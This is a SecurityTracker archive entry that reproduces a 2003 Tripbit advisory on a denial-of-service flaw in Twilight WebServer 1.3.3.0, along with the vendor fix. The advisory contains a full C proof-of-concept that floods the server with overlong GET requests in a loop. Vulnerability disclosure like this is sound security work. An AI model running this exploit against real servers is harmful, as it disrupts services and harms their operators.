SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Twilight Utilities Web Server Vendors:   Twilight Utilities
(More Information is Available) Re: Twilight Utilities Web Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1007193
SecurityTracker URL:  http://securitytracker.com/id/1007193
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 14 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.3.0 and prior versions
Description:   A vulnerability was reported in the Twilight Utilities Web Server. A remote user can cause the web server to crash.

In the original Alert, Security-Protocols Research Labs reported that a remote user can send a specially crafted HTTP GET request to cause the web service to crash. According to that original report, an HTTP GET request followed with 4096 characters would trigger the flaw.

Tripbit Security has since reported that, in version 1.3.3.0, a much smaller number (1037) of characters can be used to trigger the flaw. A demonstration exploit script is provided in the Source Message.

Impact:   A remote user can cause the web service to crash.
Solution:   The vendor has issued a fixed version (1.3.4.0).
Vendor URL:  www.twilightutilities.com/WebServer.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Apr 16 2003 Twilight Utilities Web Server Can Be Crashed By Remote Users



 Source Message Contents

Subject:  TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0


--------------060901050600060204080404
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------060901050600060204080404
Content-Type: text/plain;
 name="twilight_webserver_advisory.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="twilight_webserver_advisory.txt"

TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0 
contributed by: rushjo
====================================================================================== 
Tripbit Security Advisory 

TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0 
====================================================================================== 


PROGRAM: Twilight WebServer v1.3.3.0  
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0    
RISK: Medium 
IMPACT: Denial of Service Attack  
RELEASE DATE: 2003-07 


====================================================================================== 
TABLE OF CONTENTS 
====================================================================================== 


1..........................................................DESCRIPTION 
2..............................................................DETAILS 
3..............................................................EXPLOIT 
4............................................................SOLUTIONS 
5........................................................VENDOR STATUS 
6..............................................................CREDITS 
7...........................................................DISCLAIMER 
8...........................................................REFERENCES 
9.............................................................FEEDBACK 


1. DESCRIPTION 
====================================================================================== 


"We are excited to present this completely new Modem Ready Internet Web Server 
supporting these terrific features. 

* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truely unique files-sharing tool"

(This description is taken from the website of Twilight Ultilities)
 

2. DETAILS 
====================================================================================== 




A security vulnerability in Twilight WebServer allows remote 
attackers to crash the server by sending two an too long "get Request". 


3. EXPLOIT 
====================================================================================== 


This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability. 


NOTE: This is only for INFORMATION purposes and not for any 
      destructive acts!


/****************************************************************************
* 	Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
*	Author: posidron
*
*	Date: 2003-07-07
*	Reference: http://www.twilightutilities.com
*	Version: Twilight Webserver v1.3.3.0
*	Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*	
*	Exploit: twilight.c
*	Compile: gcc twilight -o twilight
*	
*	Tripbit Security Development
*
*	Contact
*	[-] Mail: posidron@tripbit.org
*	[-] Web: http://www.tripbit.org
*	[-] IRC: irc.euirc.net 6667 #tripbit
*
* 	Program received signal SIGSEGV, Segmentation fault.
*	0x41d780 in ?? ()
*****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
	int sockfd;
	struct sockaddr_in srv;
	struct hostent *host;
	char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";

	memset(flood, 0x41, 1037);
	
	strncpy(send, get, sizeof(send) -1);
	strncat(send, flood, sizeof(send) - strlen(send) -1);
	strncat(send, http, sizeof(send) - strlen(send) -1);
	
	if(argc < 3)
	{ 
		printf("Usage: %s [target] <port>\n", argv[0]); 
		exit(0); 
	}

	if((host = gethostbyname(argv[1])) == NULL)
	{	
		printf("Unknown host!\n"); 
		exit(0); 
	}
	
	srv.sin_family = AF_INET;
	srv.sin_port = htons(atoi(argv[2]));
	srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

	printf("DoS against Twilight Webserver v1.3.3.0\n");

	for(;;)
	{
		if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
		{ 
			printf("Can't start socket()!\n"); exit(0); 
		}
	
		if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
		{ 
			printf("Connection to server broken!\n"); close(sockfd); 
		}
	
		if(write(sockfd, send, strlen(send)) < 0)
		{ 
			break;
		}
	
		close(sockfd);
	}
	
	printf("Attack done!...\n");
	
	return 0;
}



This error causes an "crash" of the Twilight WebServer v1.3.3.0.



4. SOLUTIONS 
================================================================================ 


Upgrade your Twilight WebServer to the new fixed version v.1.3.4.0. This version
is avaible at http://www.twilightutilities.com. 



5. VENDOR STATUS 
================================================================================ 


The vendor has reportedly been notified. He didn't answer to your report but
NOW there is an new fixed version avaible for download. 



6. CREDITS 
================================================================================ 


Discovered by posidron 



7. DISLAIMER 
====================================================================== 


The information within this paper may change without notice. Use of 
this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. In no event 
shall the author be liable for any damages whatsoever arising out of 
or in connection with the use or spread of this information. Any use 
of this information is at the user's own risk. 



8. REFERENCES 
====================================================================== 


- Original Version: 
http://www.tripbit.org


9. FEEDBACK 
====================================================================== 


Please send suggestions, updates, and comments to: 


Tripbit Security Advisory 
http://www.tripbit.org 
rushjo@tripbit.org
posidron@tripbit.org 




--------------060901050600060204080404--


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC